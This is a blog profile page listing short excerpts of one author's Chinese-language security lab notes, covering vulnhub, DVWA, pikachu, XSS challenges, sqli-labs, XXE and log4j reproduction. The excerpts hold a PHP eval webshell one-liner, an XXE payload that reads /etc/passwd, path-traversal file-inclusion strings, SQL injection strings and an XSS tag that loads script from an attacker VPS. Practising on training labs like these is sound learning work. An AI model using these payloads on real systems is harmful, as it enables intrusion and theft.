- 博客(13)
- 收藏
- 关注
RSS订阅原创 vulnhub:xss_and_mysql_file
xssandmysq 使用sqlmap进行dump数据库 使用冰歇shell 或者换成菜刀的一句话木马 网上有 使用冰蝎进行链接 这个百度贼全Kali—Dirbuster工具用法 - 简书 (jianshu.com)
2022-06-21 21:45:17
982
1
原创 记录安装在widows vulmap过程Fatal error in launcher: Unable to create process using ‘
目录源码下载地址:git clone https://github.com/zhzyker/vulmap.git里面有readme 文档安装遇到pip3 无法安装时 使用下面这种方法,真简单粗暴(6条消息) 成功解决pip Fatal error in launcher: Unable to create process using_wait......的博客-CSDN博客...
2022-05-19 16:12:40
240
原创 墨者 Linux 提权命令 CVE-2017-16695
通过xftp传输文件可以通过地址 url 下载然后在xftp传输进入使用gcc -o 参数 进行c文件编写./名称 为运行文件 如果提示权限不够 chmod +x 名称查看key.txt 获得
2022-05-18 19:36:14
223
原创 apache log4j vulfocus 复现
环境配置cenos7 搭建docker 拉去vulfocus靶场kali如果这不长时间卡顿 就是网络的问题 可以尝试终止命令重新下载。同学5g网真的块docker pull vulfocus/vulfocus:latest拉取docker环境docker run -d -p 801:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.137.11 vulfocus/vulf...
2022-05-12 15:59:24
349
原创 dvwa 文件上传 high等级文件上传 low命令执行+文件包含
文件包含low<?php phpinfo();@eval($_POST[pp]);?>创建 a1.php 写入一句话木马 访问链接127.0.0.1/dvwa-master/vulnerabilities/upload/../../hackable/uploads/a1.phpmedium需要用到 bp和低等级代码比较 多了一条校验 mime类型的过滤条件 可以用 bp抓包修改打开浏览器 代理 设置好bp的地址两边需要相同的ip和端..
2022-04-26 20:47:32
2024
原创 pikaqiu 文件上传 和文件包含漏洞
文件包含漏洞的考虑常用的几种包含方式为同目录包含 file=.htaccess 目录遍历 ?file=../../../../../../../../../var/lib/locate.db 日志注入 ?file=../../../../../../../../../var/log/apache/error.log 利用 /proc/self/environ其中日志可以使用SSH日志或者Web日志等多种日志来源测试 一句话木马 <php @eval($_POST[pp]);?&g...
2022-04-24 11:14:49
280
原创 xxe漏洞复现widgets
靶场1.找注入点发现在电子邮件中 返回了报错信息,为注入点<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE a [<!ELEMENT a ANY ><!ENTITY abc SYSTEM "file:///etc/passwd">]><root><name>1</name><tel>2</tel><email&g
2022-04-19 19:36:32
254
2
原创 sql map 15 16
15关 寻找注入点那找的是给我脑子找没了15关居然能用报错注入 我服了在聊天框里面输入在尝试过:”‘“)’)”))‘))后找到了单引号是这个的闭环符号这里还只能用#号注释' or 1=1 #找到了注入点就尝试用报错注入的方式来攻击:if的用法if (1>2,则输出对应值0,1(布尔值 不是真就是假),否则服务器耗时超过10秒钟左右)' or if (length(database())=8,1,sleep(10))#'
2022-04-17 20:49:27
2808
原创 cenos redis安装
# wget http://download.redis.io/releases/redis-2.8.17.tar.gz# tar xzf redis-2.8.17.tar.gz# cd redis-2.8.17# make到这步就安装完成了redis.conf 在<root@localhost redis-2.8.17>vim redis.confdaemonize是守护进程 默认为on yes为后台运行./redis.server ;./redis
2022-04-10 20:45:11
951
转载 xss知识点总结
<script> alert(弹窗的值);</script><script src="http://<yourVPS>/xss.js"></script>asd在php中单引号中的变量是不被解析的,双引号中的变量和数组及常量是可以被解析的。on事件大全onactivate 当对象设置为活动元素时触发。 onafterprint 对象所关联的文档打印或打印预览后立即在对象上触发。 onbeforeactivate 对象要被设置..
2022-03-17 18:28:51
272
原创 xss挑战1-10
xsslevel1代码xsslevel1代码2第1中方法反射性第二种script标签level 3level4lelvel5scripta标签level6a链接">xss</alevle7lelve8level9level10<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html...
2022-03-09 19:25:33
834
原创 level1-3xss攻击
xsslevel1代码<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><script>window.alert = function() { confirm("完成的不错!"); window.location.href="level...
2022-03-09 08:45:42
881
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人